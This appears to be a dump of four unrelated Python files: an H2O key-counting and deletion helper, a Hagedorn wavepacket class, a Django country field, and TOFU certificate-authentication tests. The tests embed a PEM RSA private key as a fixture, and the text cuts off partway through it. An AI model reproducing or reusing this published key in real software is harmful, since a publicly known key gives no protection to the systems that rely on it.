return totalDeletedCnt
def count_keys(node=None, pattern=None, timeoutSecs=90):
if not node: node = h2o.nodes[0]
kwargs = {'filter': pattern}
nodeCnt = 0
offset = 0
while True:
# we get 20 at a time with default storeView
# if we get < 20, we're done
storeViewResult = h2o_cmd.runStoreView(node, timeoutSecs=timeoutSecs, offset=offset, view=20, **kwargs)
keys = storeViewResult['keys']
if not keys:
break
nodeCnt += len(storeViewResult['keys'])
if len(keys) < 20:
break
offset += 20
print nodeCnt, "keys at %s:%s" % (node.http_addr, node.port)
return nodeCnt
def count_keys_at_all_nodes(node=None, pattern=None, timeoutSecs=90):
if not node: node = h2o.nodes[0]
totalCnt = 0
# do it in reverse order, since we always talk to 0 for other stuff
# this will be interesting if the others don't have a complete set
# theoretically, the deletes should be 0 after the first node
# since the deletes should be global
for node in reversed(h2o.nodes):
nodeCnt = count_keys(node, pattern=pattern, timeoutSecs=timeoutSecs)
totalCnt += nodeCnt
if pattern:
print "Total: ", totalCnt, "keys with filter=", pattern, "at", len(h2o.nodes), "nodes"
else:
print "Total: ", totalCnt, "keys at", len(h2o.nodes), "nodes"
return totalCnt
#****************************************************************************************
# Since we can't trust a single node storeview list, this will get keys that match text
# for deleting, from a list saved from an import
def delete_keys_from_import_result(node=None, pattern=None, importResult=None, timeoutSecs=30):
if not node: node = h2o.nodes[0]
# the list could be from hdfs/s3 or local. They have to different list structures
deletedCnt = 0
if 'succeeded' in importResult:
kDict = importResult['succeeded']
for k in kDict:
key = k['key']
if (pattern in key) or pattern is None:
print "Removing", key
removeKeyResult = node.remove_key(key=key)
deletedCnt += 1
elif 'keys' in importResult:
kDict = importResult['keys']
for k in kDict:
key = k
if (pattern in key) or pattern is None:
print "Removing", key
removeKeyResult = node.remove_key(key=key)
deletedCnt += 1
else:
raise Exception ("Can't find 'files' or 'succeeded' in your file dict. why? not from hdfs/s3 or local?")
print "Deleted", deletedCnt, "keys at", node
return deletedCnt
|
|
"""The WaveBlocks Project
This file contains the class which represents a homogeneous Hagedorn wavepacket.
@author: R. Bourquin
@copyright: Copyright (C) 2010, 2011 R. Bourquin
@license: Modified BSD License
"""
from functools import partial
from numpy import zeros, complexfloating, array, sum, transpose, arange
from scipy import pi, sqrt, exp, conj, dot
from scipy.linalg import norm
from ComplexMath import cont_sqrt
from Wavepacket import Wavepacket
from HomogeneousQuadrature import HomogeneousQuadrature
import GlobalDefaults as GD
class HagedornWavepacket(Wavepacket):
r"""
This class represents homogeneous vector valued wavepackets :math:`|\Psi\rangle`.
"""
def __init__(self, parameters):
r"""
Initialize the ``HagedornWavepacket`` object that represents :math:`|\Psi\rangle`.
:param parameters: A ``ParameterProvider`` instance or a dict containing simulation parameters.
:raise ValueError: For :math:`N < 1` or :math:`K < 2`.
"""
#: Number of components :math:`\Phi_i` the wavepacket :math:`|\Psi\rangle` has got.
self.number_components = parameters["ncomponents"]
if self.number_components < 1:
raise ValueError("Number of components of the Hagedorn wavepacket has to be >= 1.")
# Size of the basis from which we construct the wavepacket.
# If there is a key "basis_size" in the input parameters, the corresponding
# value can be either a single int or a list of ints. If there is no such key
# we use the values from the global defaults.
if parameters.has_key("basis_size"):
bs = parameters["basis_size"]
if type(bs) is list or type(bs) is tuple:
if not len(bs) == self.number_components:
raise ValueError("Number of value(s) for basis size(s) does not match.")
self.basis_size = bs[:]
else:
self.basis_size = self.number_components * [ bs ]
else:
self.basis_size = self.number_components * [ GD.default_basis_size ]
if any([bs < 2 for bs in self.basis_size]):
raise ValueError("Number of basis functions for Hagedorn wavepacket has to be >= 2.")
# Cache the parameter values epsilon we will use over and over again.
self.eps = parameters["eps"]
#: The parameter set Pi initialized to the Harmonic Oscillator Eigenfunctions
self.P, self.Q, self.S, self.p, self.q = GD.default_Pi
#: The coefficients :math:`c^i` of the linear combination for each component :math:`\Phi_k`.
self.coefficients = [ zeros((self.basis_size[index],1), dtype=complexfloating) for index in xrange(self.number_components) ]
#: An object that can compute brakets via quadrature.
self.quadrature = None
self._cont_sqrt_cache = 0.0
def __str__(self):
r"""
:return: A string describing the Hagedorn wavepacket.
"""
s = "Homogeneous Hagedorn wavepacket with "+str(self.number_components)+" components\n"
return s
def clone(self, keepid=False):
# Parameters of this packet
params = {"ncomponents": self.number_components,
"eps": self.eps}
# Create a new Packet
other = HagedornWavepacket(params)
# If we wish to keep the packet ID
if keepid is True:
other.set_id(self.get_id())
# And copy over all (private) data
other.set_basis_size(self.get_basis_size())
other.set_quadrature(self.get_quadrature())
other.set_parameters(self.get_parameters())
other.set_coefficients(self.get_coefficients())
other._cont_sqrt_cache = self._cont_sqrt_cache
return other
def get_parameters(self, component=None, aslist=False):
r"""
Get the Hagedorn parameters :math:`\Pi` of the wavepacket :math:`\Psi`.
:param component: Dummy parameter for API compatibility with the inhomogeneous packets.
:param aslist: Return a list of :math:`N` parameter tuples. This is for API compatibility with inhomogeneous packets.
:return: The Hagedorn parameters :math:`P`, :math:`Q`, :math:`S`, :math:`p`, :math:`q` of :math:`\Psi` in this order.
"""
if aslist is True:
return self.number_components * [(self.P, self.Q, self.S, self.p, self.q)]
return (self.P, self.Q, self.S, self.p, self.q)
def set_parameters(self, parameters, component=None):
r"""
Set the Hagedorn parameters :math:`\Pi` of the wavepacket :math:`\Psi`.
:param parameters: The Hagedorn parameters :math:`P`, :math:`Q`, :math:`S`, :math:`p`, :math:`q` of :math:`\Psi` in this order.
:param component: Dummy parameter for API compatibility with the inhomogeneous packets.
"""
(self.P, self.Q, self.S, self.p, self.q) = parameters
def set_quadrature(self, quadrature):
r"""
Set the ``HomogeneousQuadrature`` instance used for evaluating brakets.
:param quadrature: The new ``HomogeneousQuadrature`` instance. May be ``None``
to use a dafault one with a quadrature rule of order :math:`K+4`.
"""
# TODO: Put an "extra accuracy" parameter into global defaults with value of 4.
# TODO: Improve on the max(basis_size) later
# TODO: Rethink if wavepackets should contain a QR
if quadrature is None:
self.quadrature = HomogeneousQuadrature(order=max(self.basis_size) + 4)
else:
self.quadrature = quadrature
def get_quadrature(self):
r"""
Return the ``HomogeneousQuadrature`` instance used for evaluating brakets.
:return: The current instance ``HomogeneousQuadrature``.
"""
return self.quadrature
def evaluate_basis_at(self, nodes, component=None, prefactor=False):
r"""
Evaluate the Hagedorn functions :math:`\phi_k` recursively at the given nodes :math:`\gamma`.
:param nodes: The nodes :math:`\gamma` at which the Hagedorn functions are evaluated.
:param component: Takes the basis size :math:`K_i` of this component :math:`i` as upper bound for :math:`K`.
:param prefactor: Whether to include a factor of :math:`\left(\det\left(Q\right)\right)^{-\frac{1}{2}}`.
:return: Returns a twodimensional :math:`K` times #nodes array :math:`H` where the entry :math:`H[k,i]` is
the value of the :math:`k`-th Hagedorn function evaluated at the node :math:`i`.
"""
if component is not None:
basis_size = self.basis_size[component]
else:
# Evaluate up to maximal :math:`K_i` and slice later if necessary
basis_size = max(self.basis_size)
H = zeros((basis_size, nodes.size), dtype=complexfloating)
Qinv = self.Q**(-1.0)
Qbar = conj(self.Q)
nodes = nodes.reshape((1,nodes.size))
H[0] = pi**(-0.25)*self.eps**(-0.5) * exp(1.0j/self.eps**2 * (0.5*self.P*Qinv*(nodes-self.q)**2 + self.p*(nodes-self.q)))
H[1] = Qinv*sqrt(2.0/self.eps**2) * (nodes-self.q) * H[0]
for k in xrange(2, basis_size):
H[k] = Qinv*sqrt(2.0/self.eps**2)*1.0/sqrt(k) * (nodes-self.q) * H[k-1] - Qinv*Qbar*sqrt((k-1.0)/k) * H[k-2]
if prefactor is True:
sqrtQ, self._cont_sqrt_cache = cont_sqrt(self.Q, reference=self._cont_sqrt_cache)
H = 1.0/sqrtQ*H
return H
def evaluate_at(self, nodes, component=None, prefactor=False):
r"""
Evaluete the Hagedorn wavepacket :math:`\Psi` at the given nodes :math:`\gamma`.
:param nodes: The nodes :math:`\gamma` at which the Hagedorn wavepacket gets evaluated.
:param component: The index :math:`i` of a single component :math:`\Phi_i` to evaluate. (Defaults to 'None' for evaluating all components.)
:param prefactor: Whether to include a factor of :math:`\left(\det\left(Q\right)\right)^{-\frac{1}{2}}`.
:return: A list of arrays or a single array containing the values of the :math:`\Phi_i` at the nodes :math:`\gamma`.
"""
nodes = nodes.reshape((1,nodes.size))
basis = self.evaluate_basis_at(nodes, component=component, prefactor=prefactor)
phase = exp(1.0j*self.S/self.eps**2)
if component is not None:
values = phase * sum(self.coefficients[component] * basis, axis=0)
else:
# Remember to slice the basis to the correct basis size for each component
values = [ phase * sum(self.coefficients[index] * basis[:self.basis_size[index],:], axis=0) for index in xrange(self.number_components) ]
return values
def get_norm(self, component=None, summed=False):
r"""
Calculate the :math:`L^2` norm of the wavepacket :math:`|\Psi\rangle`.
:param component: The component :math:`\Phi_i` of which the norm is calculated.
:param summed: Whether to sum up the norms of the individual components :math:`\Phi_i`.
:return: A list containing the norms of all components :math:`\Phi_i` or the overall norm of :math:`\Psi`.
"""
if component is not None:
result = norm(self.coefficients[component])
else:
result = [ norm(item) for item in self.coefficients ]
if summed is True:
result = reduce(lambda x,y: x+conj(y)*y, result, 0)
result = sqrt(result)
return result
def potential_energy(self, potential, summed=False):
r"""
Calculate the potential energy :math:`\langle\Psi|V|\Psi\rangle` of the wavepacket componentwise.
:param potential: The potential energy operator :math:`V` as function.
:param summed: Wheter to sum up the individual integrals :math:`\langle\Phi_i|V_{i,j}|\Phi_j\rangle`.
:return: The potential energy of the wavepacket's components :math:`\Phi_i` or the overall potential energy of :math:`\Psi`.
"""
f = partial(potential, as_matrix=True)
Q = self.quadrature.quadrature(self, f)
tmp = [ item[0,0] for item in Q ]
N = self.number_components
epot = [ sum(tmp[i*N:(i+1)*N]) for i in xrange(N) ]
if summed is True:
epot = sum(epot)
return epot
def kinetic_energy(self, summed=False):
r"""
Calculate the kinetic energy :math:`\langle\Psi|T|\Psi\rangle` of the wavepacket componentwise.
:param summed: Wheter to sum up the individual integrals :math:`\langle\Phi_i|T_{i,j}|\Phi_j\rangle`.
:return: The kinetic energy of the wavepacket's components :math:`\Phi_i` or the overall kinetic energy of :math:`\Psi`.
"""
tmp = [ self.grady(component) for component in xrange(self.number_components) ]
# TODO: Check 0.25 vs orig 0.5!
ekin = [ 0.25*norm(item)**2 for item in tmp ]
if summed is True:
ekin = sum(ekin)
return ekin
def grady(self, component):
r"""
Compute the effect of the operator :math:`-i \varepsilon^2 \frac{\partial}{\partial x}` on the basis
functions of a component :math:`\Phi_i` of the Hagedorn wavepacket :math:`\Psi`.
:param component: The index :math:`i` of the component :math:`\Phi_i` on which we apply the above operator.
:return: The modified coefficients.
"""
sh = array(self.coefficients[component].shape)
c = zeros(sh+1, dtype=complexfloating)
k = 0
c[k] = c[k] + self.p*self.coefficients[component][k]
c[k+1] = c[k+1] + sqrt(k+1)*self.P*sqrt(self.eps**2*0.5)*self.coefficients[component][k]
for k in xrange(1,self.basis_size[component]):
c[k] = c[k] + self.p*self.coefficients[component][k]
c[k+1] = c[k+1] + sqrt(k+1)*self.P*sqrt(self.eps**2*0.5)*self.coefficients[component][k]
c[k-1] = c[k-1] + sqrt(k)*conj(self.P)*sqrt(self.eps**2*0.5)*self.coefficients[component][k]
return c
def project_to_canonical(self, potential, assign=True):
r"""
Project the Hagedorn wavepacket into the canonical basis.
:param potential: The potential :math:`V` whose eigenvectors :math:`nu_l` are used for the transformation.
:param assign: Whether to assign the new coefficient values to the wavepacket. Default true.
.. note:: This function is expensive and destructive! It modifies the coefficients
of the ``self`` instance if the ``assign`` parameter is True (default).
"""
# No projection for potentials with a single energy level.
# The canonical and eigenbasis are identical here.
if potential.get_number_components() == 1:
return
potential.calculate_eigenvectors()
# Basically an ugly hack to overcome some shortcomings of the matrix function
# and of the data layout.
def f(q, x):
x = x.reshape((self.quadrature.get_qr().get_number_nodes(),))
z = potential.evaluate_eigenvectors_at(x)
result = []
for col in xrange(self.number_components):
for row in xrange(self.number_components):
result.append( z[col][row,:] )
return result
F = transpose(conj(self.quadrature.build_matrix(self, f)))
c = self.get_coefficient_vector()
d = dot(F, c)
if assign is True:
self.set_coefficient_vector(d)
else:
return d
def project_to_eigen(self, potential, assign=True):
r"""
Project the Hagedorn wavepacket into the eigenbasis of a given potential :math:`V`.
:param potential: The potential :math:`V` whose eigenvectors :math:`nu_l` are used for the transformation.
:param assign: Whether to assign the new coefficient values to the wavepacket. Default true.
.. note:: This function is expensive and destructive! It modifies the coefficients
of the ``self`` instance if the ``assign`` parameter is True (default).
"""
# No projection for potentials with a single energy level.
# The canonical and eigenbasis are identical here.
if potential.get_number_components() == 1:
return
potential.calculate_eigenvectors()
# Basically an ugly hack to overcome some shortcomings of the matrix function
# and of the data layout.
def f(q, x):
x = x.reshape((self.quadrature.get_qr().get_number_nodes(),))
z = potential.evaluate_eigenvectors_at(x)
result = []
for col in xrange(self.number_components):
for row in xrange(self.number_components):
result.append( z[col][row,:] )
return result
F = self.quadrature.build_matrix(self, f)
c = self.get_coefficient_vector()
d = dot(F, c)
if assign:
self.set_coefficient_vector(d)
else:
return d
def to_fourier_space(self, assign=True):
r"""
Transform the wavepacket to Fourier space.
:param assign: Whether to assign the transformation to this packet or return a cloned packet.
.. note:: This is the inverse of the method ``to_real_space()``.
"""
# The Fourier transformed parameters
Pihat = (1.0j*self.Q, -1.0j*self.P, self.S, -self.q, self.p)
# The Fourier transformed coefficients
coeffshat = []
for index in xrange(self.number_components):
k = arange(0, self.basis_size[index]).reshape((self.basis_size[index], 1))
# Compute phase arising from the transformation
phase = (-1.0j)**k * exp(-1.0j*self.p*self.q / self.eps**2)
# Absorb phase into the coefficients
coeffshat.append(phase * self.get_coefficients(component=index))
if assign is True:
self.set_parameters(Pihat)
self.set_coefficients(coeffshat)
else:
FWP = self.clone()
FWP.set_parameters(Pihat)
FWP.set_coefficients(coeffshat)
return FWP
def to_real_space(self, assign=True):
r"""
Transform the wavepacket to real space.
:param assign: Whether to assign the transformation to this packet or return a cloned packet.
.. note:: This is the inverse of the method ``to_fourier_space()``.
"""
# The inverse Fourier transformed parameters
Pi = (1.0j*self.Q, -1.0j*self.P, self.S, self.q, -self.p)
# The inverse Fourier transformed coefficients
coeffs = []
for index in xrange(self.number_components):
k = arange(0, self.basis_size[index]).reshape((self.basis_size[index], 1))
# Compute phase arising from the transformation
phase = (1.0j)**k * exp(-1.0j*self.p*self.q / self.eps**2)
# Absorb phase into the coefficients
coeffs.append(phase * self.get_coefficients(component=index))
if assign is True:
self.set_parameters(Pi)
self.set_coefficients(coeffs)
else:
RWP = self.clone()
RWP.set_parameters(Pi)
RWP.set_coefficients(coeffs)
return RWP
|
|
# Code obtained from: http://code.djangoproject.com/attachment/ticket/5446/country_and_language_fields_trunk.2.patch
# Countries list - ISO 3166-1993 (E)
# http://xml.coverpages.org/country3166.html
from django.db.models.fields import CharField
from django.utils.translation import ugettext_lazy as _, ugettext
from django.template.defaultfilters import slugify
COUNTRIES = [
('AD', _('Andorra')),
('AE', _('United Arab Emirates')),
('AF', _('Afghanistan')),
('AG', _('Antigua & Barbuda')),
('AI', _('Anguilla')),
('AL', _('Albania')),
('AM', _('Armenia')),
('AN', _('Netherlands Antilles')),
('AO', _('Angola')),
('AQ', _('Antarctica')),
('AR', _('Argentina')),
('AS', _('American Samoa')),
('AT', _('Austria')),
('AU', _('Australia')),
('AW', _('Aruba')),
('AZ', _('Azerbaijan')),
('BA', _('Bosnia and Herzegovina')),
('BB', _('Barbados')),
('BD', _('Bangladesh')),
('BE', _('Belgium')),
('BF', _('Burkina Faso')),
('BG', _('Bulgaria')),
('BH', _('Bahrain')),
('BI', _('Burundi')),
('BJ', _('Benin')),
('BM', _('Bermuda')),
('BN', _('Brunei Darussalam')),
('BO', _('Bolivia')),
('BR', _('Brazil')),
('BS', _('Bahama')),
('BT', _('Bhutan')),
('BV', _('Bouvet Island')),
('BW', _('Botswana')),
('BY', _('Belarus')),
('BZ', _('Belize')),
('CA', _('Canada')),
('CC', _('Cocos (Keeling) Islands')),
('CF', _('Central African Republic')),
('CG', _('Congo')),
('CH', _('Switzerland')),
('CI', _('Ivory Coast')),
('CK', _('Cook Islands')),
('CL', _('Chile')),
('CM', _('Cameroon')),
('CN', _('China')),
('CO', _('Colombia')),
('CR', _('Costa Rica')),
('CU', _('Cuba')),
('CV', _('Cape Verde')),
('CX', _('Christmas Island')),
('CY', _('Cyprus')),
('CZ', _('Czech Republic')),
('DE', _('Germany')),
('DJ', _('Djibouti')),
('DK', _('Denmark')),
('DM', _('Dominica')),
('DO', _('Dominican Republic')),
('DZ', _('Algeria')),
('EC', _('Ecuador')),
('EE', _('Estonia')),
('EG', _('Egypt')),
('EH', _('Western Sahara')),
('ER', _('Eritrea')),
('ES', _('Spain')),
('ET', _('Ethiopia')),
('FI', _('Finland')),
('FJ', _('Fiji')),
('FK', _('Falkland Islands (Malvinas)')),
('FM', _('Micronesia')),
('FO', _('Faroe Islands')),
('FR', _('France')),
('FX', _('France, Metropolitan')),
('GA', _('Gabon')),
('GB', _('United Kingdom (Great Britain)')),
('GD', _('Grenada')),
('GE', _('Georgia')),
('GF', _('French Guiana')),
('GH', _('Ghana')),
('GI', _('Gibraltar')),
('GL', _('Greenland')),
('GM', _('Gambia')),
('GN', _('Guinea')),
('GP', _('Guadeloupe')),
('GQ', _('Equatorial Guinea')),
('GR', _('Greece')),
('GS', _('South Georgia and the South Sandwich Islands')),
('GT', _('Guatemala')),
('GU', _('Guam')),
('GW', _('Guinea-Bissau')),
('GY', _('Guyana')),
('HK', _('Hong Kong')),
('HM', _('Heard & McDonald Islands')),
('HN', _('Honduras')),
('HR', _('Croatia')),
('HT', _('Haiti')),
('HU', _('Hungary')),
('ID', _('Indonesia')),
('IE', _('Ireland')),
('IL', _('Israel')),
('IN', _('India')),
('IO', _('British Indian Ocean Territory')),
('IQ', _('Iraq')),
('IR', _('Islamic Republic of Iran')),
('IS', _('Iceland')),
('IT', _('Italy')),
('JM', _('Jamaica')),
('JO', _('Jordan')),
('JP', _('Japan')),
('KE', _('Kenya')),
('KG', _('Kyrgyzstan')),
('KH', _('Cambodia')),
('KI', _('Kiribati')),
('KM', _('Comoros')),
('KN', _('St. Kitts and Nevis')),
('KP', _('Korea, Democratic People\'s Republic of')),
('KR', _('Korea, Republic of')),
('KW', _('Kuwait')),
('KY', _('Cayman Islands')),
('KZ', _('Kazakhstan')),
('LA', _('Lao People\'s Democratic Republic')),
('LB', _('Lebanon')),
('LC', _('Saint Lucia')),
('LI', _('Liechtenstein')),
('LK', _('Sri Lanka')),
('LR', _('Liberia')),
('LS', _('Lesotho')),
('LT', _('Lithuania')),
('LU', _('Luxembourg')),
('LV', _('Latvia')),
('LY', _('Libyan Arab Jamahiriya')),
('MA', _('Morocco')),
('MC', _('Monaco')),
('MD', _('Moldova, Republic of')),
('MG', _('Madagascar')),
('MH', _('Marshall Islands')),
('ML', _('Mali')),
('MN', _('Mongolia')),
('MM', _('Myanmar')),
('MO', _('Macau')),
('MP', _('Northern Mariana Islands')),
('MQ', _('Martinique')),
('MR', _('Mauritania')),
('MS', _('Monserrat')),
('MT', _('Malta')),
('MU', _('Mauritius')),
('MV', _('Maldives')),
('MW', _('Malawi')),
('MX', _('Mexico')),
('MY', _('Malaysia')),
('MZ', _('Mozambique')),
('NA', _('Namibia')),
('NC', _('New Caledonia')),
('NE', _('Niger')),
('NF', _('Norfolk Island')),
('NG', _('Nigeria')),
('NI', _('Nicaragua')),
('NL', _('Netherlands')),
('NO', _('Norway')),
('NP', _('Nepal')),
('NR', _('Nauru')),
('NU', _('Niue')),
('NZ', _('New Zealand')),
('OM', _('Oman')),
('PA', _('Panama')),
('PE', _('Peru')),
('PF', _('French Polynesia')),
('PG', _('Papua New Guinea')),
('PH', _('Philippines')),
('PK', _('Pakistan')),
('PL', _('Poland')),
('PM', _('St. Pierre & Miquelon')),
('PN', _('Pitcairn')),
('PR', _('Puerto Rico')),
('PT', _('Portugal')),
('PW', _('Palau')),
('PY', _('Paraguay')),
('QA', _('Qatar')),
('RE', _('Reunion')),
('RO', _('Romania')),
('RU', _('Russian Federation')),
('RW', _('Rwanda')),
('SA', _('Saudi Arabia')),
('SB', _('Solomon Islands')),
('SC', _('Seychelles')),
('SD', _('Sudan')),
('SE', _('Sweden')),
('SG', _('Singapore')),
('SH', _('St. Helena')),
('SI', _('Slovenia')),
('SJ', _('Svalbard & Jan Mayen Islands')),
('SK', _('Slovakia')),
('SL', _('Sierra Leone')),
('SM', _('San Marino')),
('SN', _('Senegal')),
('SO', _('Somalia')),
('SR', _('Suriname')),
('ST', _('Sao Tome & Principe')),
('SV', _('El Salvador')),
('SY', _('Syrian Arab Republic')),
('SZ', _('Swaziland')),
('TC', _('Turks & Caicos Islands')),
('TD', _('Chad')),
('TF', _('French Southern Territories')),
('TG', _('Togo')),
('TH', _('Thailand')),
('TJ', _('Tajikistan')),
('TK', _('Tokelau')),
('TM', _('Turkmenistan')),
('TN', _('Tunisia')),
('TO', _('Tonga')),
('TP', _('East Timor')),
('TR', _('Turkey')),
('TT', _('Trinidad & Tobago')),
('TV', _('Tuvalu')),
('TW', _('Taiwan, Province of China')),
('TZ', _('Tanzania, United Republic of')),
('UA', _('Ukraine')),
('UG', _('Uganda')),
('UM', _('United States Minor Outlying Islands')),
('US', _('United States of America')),
('UY', _('Uruguay')),
('UZ', _('Uzbekistan')),
('VA', _('Vatican City State (Holy See)')),
('VC', _('St. Vincent & the Grenadines')),
('VE', _('Venezuela')),
('VG', _('British Virgin Islands')),
('VI', _('United States Virgin Islands')),
('VN', _('Viet Nam')),
('VU', _('Vanuatu')),
('WF', _('Wallis & Futuna Islands')),
('WS', _('Samoa')),
('YE', _('Yemen')),
('YT', _('Mayotte')),
('YU', _('Yugoslavia')),
('ZA', _('South Africa')),
('ZM', _('Zambia')),
('ZR', _('Zaire')),
('ZW', _('Zimbabwe')),
]
COUNTRIES.sort(lambda x,y:cmp(slugify(x[1]),slugify(y[1])))
COUNTRIES.append(('ZZ', _('Unknown or unspecified country')))
def isValidCountry(field_data, all_data):
if not field_data in [lang[0] for lang in COUNTRIES]:
raise ValidationError, ugettext("This value must be in COUNTRIES setting in localflavor.generic package.")
class CountryField(CharField):
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 2)
kwargs.setdefault('choices', COUNTRIES)
super(CharField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "CharField"
|
|
from axiom.store import Store
from merlyn import auth
from OpenSSL.crypto import FILETYPE_PEM, load_certificate, load_privatekey
from twisted.python.log import ILogObserver, addObserver, removeObserver
from twisted.test.proto_helpers import StringTransport
from twisted.trial.unittest import SynchronousTestCase
from zope.interface import implementer
from zope.interface.verify import verifyObject
class UserTests(SynchronousTestCase):
def test_emailIndexed(self):
"""The email attribute of the User item is indexed.
"""
self.assertTrue(auth.User.email.indexed)
@implementer(ILogObserver)
class FakeLogObserver(object):
def __init__(self):
self.events = []
def __call__(self, eventDict):
self.events.append(eventDict)
class FakeLogObserverTests(SynchronousTestCase):
def test_interface(self):
"""The fake log observer implements ILogObserver.
"""
self.assertTrue(verifyObject(ILogObserver, FakeLogObserver()))
class TOFUContextFactoryTests(SynchronousTestCase):
"""Tests for TOFU/POP (Trust On First Use/Persistence of Pseudonym)
behavior for the context factory.
"""
def setUp(self):
self.store = Store()
self.user = auth.User(store=self.store, email="[email protected]")
self.ctxFactory = auth._TOFUContextFactory(self.store)
self.observer = FakeLogObserver()
addObserver(self.observer)
self.addCleanup(removeObserver, self.observer)
def _getLogMessage(self):
for e in self.observer.events:
if not e.get("message"):
continue
return e["message"][0]
def test_firstConnection(self):
"""First connections store the digest. Connection succeeds.
"""
verifyResult = self.ctxFactory._verify(None, realUserCert, 0, 0, 0)
self.assertTrue(verifyResult)
self.assertEqual(self.user.digest, realUserCert.digest("sha512"))
message = self._getLogMessage()
self.assertIn("First connection", message)
self.assertIn(self.user.email, message)
self.assertIn(self.user.digest, message)
def test_correctDigest(self):
"""Connection attempts with the correct digest succeed.
"""
self.user.digest = realUserCert.digest("sha512")
verifyResult = self.ctxFactory._verify(None, realUserCert, 0, 0, 0)
self.assertTrue(verifyResult)
message = self._getLogMessage()
self.assertIn("Successful connection", message)
self.assertIn(self.user.email, message)
def test_noSuchEmail(self):
"""Connection attempts for unknown e-mail addresses fail.
"""
verifyResult = self.ctxFactory._verify(None, bogusCert, 0, 0, 0)
self.assertFalse(verifyResult)
message = self._getLogMessage()
self.assertIn("Connection attempt", message)
self.assertIn("by {!r}".format(auth.emailForCert(bogusCert)), message)
self.assertIn("digest was " + bogusCert.digest("sha512"), message)
def test_badDigest(self):
"""Connection attempts with a bad digest fail.
"""
self.user.digest = realUserCert.digest("sha512")
verifyResult = self.ctxFactory._verify(None, impostorCert, 0, 0, 0)
self.assertFalse(verifyResult)
message = self._getLogMessage()
self.assertIn("Failed connection", message)
self.assertIn("digest was " + impostorCert.digest("sha512"), message)
self.assertIn("expecting " + self.user.digest, message)
class UserMixinTests(SynchronousTestCase):
def setUp(self):
self.userMixin = auth.UserMixin()
self.store = self.userMixin.store = Store()
def test_getUser(self):
"""The user mixin gets the user using the peer certificate.
"""
user = auth.User(store=self.store,
email="[email protected]",
digest=realUserCert.digest("sha512"))
self.userMixin.transport = transport = StringTransport()
transport.getPeerCertificate = lambda: realUserCert
self.assertEqual(self.userMixin.user, user)
def test_cache(self):
"""If the ``_user`` cache is primed, it is used.
"""
sentinel = object()
self.userMixin._user = sentinel
self.assertEqual(self.userMixin.user, sentinel)
realUserKey = load_privatekey(FILETYPE_PEM, """
-----BEGIN RSA PRIVATE KEY-----
MIIJJwIBAAKCAgEApnviSoR0JPFjSaYs3pB4ycA2+CNcvnPpFFMZscATw5J+H5Sd
+P2xYo5XP7N8Kjs6RxFwu50fePqO5BXpMlum0KGP3hT7gQ9uk2WkaXFF5FEHwBkN
Sa8JTHXoHp5n2QWkh/h5G5lSkjfk5IzdzJYsI7LVCFnS8FEL4r5EOTm32EDNIQgv
1FhmT3rAw7swAUc984oZrGbaGDAJpt8WfCFZG0mUU1ha6ASb5dtQZ2pxvJ5ZJRco
V7vd2nTeSMhUKCDPrQqdnwH657s6TzXWE8VkI0rN7LYFtaCRbI9VoRWZwosrRJgL
DvRMg3I3baX/lRckYwDmsNr0200TfSAT8kqEKhdOH0zk3OpA7KuAjCdWQZMY1C8V
2jPYwuePIfRHYOUIxWTBaka6KNNWa9r2mSLA0IcZ6ddfeNf5j2rTrA9h+dvmFEtK
UOkpxmKUWeNLJBcUz+TBiOfzMgMRUHM6C0SQAVqPVVZZp5dWt8GX6V2wyQrh584T
bYHE3kCKmpZhY+TaeoQV7pi3oQ2KmX0Ao94ecMqFuqL4WFABb0d1vx8kxfPyJ0Fg
U9hSMrwRE+ExGrZ69VF0RNknxBZZDREzD9GJVlTZXLOx37i+7LbtKmZXeZXwuLKJ
vrktXDDaQPUV66DWamqnjUQ6NlYrdFY4omRNISOcT8ytjRpyocxpt8YtlfECAwEA
AQKCAgEAiofJK6J9loP5zz3kVio3KAG2e9HJCX0ftFbVqY+fonwSUKr0rExFPzIc
LZhnOCjifGJpwOOkXaF4JxiIW+vhqfbV5MDm6mRx6VqJbWfg9XPrlBAEe4yXmzT9
OgUrem10k+PQuoNhLuQtpXQF14gaIHZdR76ehHOcBUe3Mzrw3JRHXDYYvoP0VixZ
nET1VAr45N7EMC3BSqEmVuGJLy78m3UlZBjARBIZuzE7/WGYVJAas39KhX6Aw5e9
oyh2xpFO3blYoQgfxJWJloHAqeD1S1yib1ai95gtifzXDtwPfs8Y6NHvWbk0tafj
sWyQeHmyQGNukjkPyC+hiNuZXWJeB+RKVm7lBZ8zG5sR50UGAeT3qptsUm8eVODo
iCeoJut8DHmT0DfA/RG6TKaekuDXGWhMwh9aTnltHt9a9fpC41KqXNNjudwBl+Sb
3QKTEf06iL+MssUrGEYjdRoftmk8W2BNzWb0zWl+D75ejzal1zuVRyJ9qf7VVypb
cL0znKPypSEsG1vX18H6dAKw8xCsjzm9MMPB4iJ+mpbLLJN2GTeYZ2HGg7/NMRWB
G70V88ZRjWJIh9tSYsDQloccQm0SlK/TDaGgYu1iRna+lxE0pvV2iTfsCJM1200i
Q0KMJsFmOkiSymp/R7UAnyCdjlhAMUnOm9x7cVR9fx8Ix3Zb1EUCggEBANeRedOz
CfTO9cf40G9g18vFztPY3o5eUaL+pK9kCVwWWZxbRz6J/ys7BKKtTBXCeNqIu3WA
rsSpQ6DNhSv9fXz7g9trorNPZQuXqw+d2Rw89VwYJiWydl8+cM/r8qDYKfTOoGP0
J/TvkwznqCsE+ZKUAGhfUoek5oMyXyE8q6GrLTkhjOagEFN5j0VZknrkBllv/Xnl
pbSmK89mA7d2e76yoXDvzUqDor500oFzCCt64VRrXKBhXDr2mrnBCazMahGNTIaJ
U6491UxqOQN/TCZ+IN3EuW0CS8f9XZxaS26JJrIO/TtA34QeoKHj/j94UnxlQjPo
vTaUxkg7Ur2RPYsCggEBAMW1nsJjPVjXUUnCBHVwCAz0KvLi+R+ZgpH99ANgTeYn
jqP5RkjIPSKVFJWqmEpt52MBSBad79ypzYkcTtT3nXkeAgTwJuQEnveNCaSMpmlQ
bMOgQO+tMydZH4CoEkdijPIfwEooTPKP9crn22+z7XhK4v/s0iaBE4IqBSPrUAjd
ZfVDB3lgxF7tqukwxSIqXbfvhPbGLewjmM6E+RwncJ1HJrbQMybSQLe5TtKS4nKQ
e+xeu/kW7uP+FCK7oTeIyuvbDEWsKCLCYcjkax4hCd/rJs+pMdKkYke0H+ySZxwk
8OramVCF2K9pyiemcjJBN6ElSoGYhW/pM3RCHkPL4fMCgf8GvIUSGIY3IECN/ziE
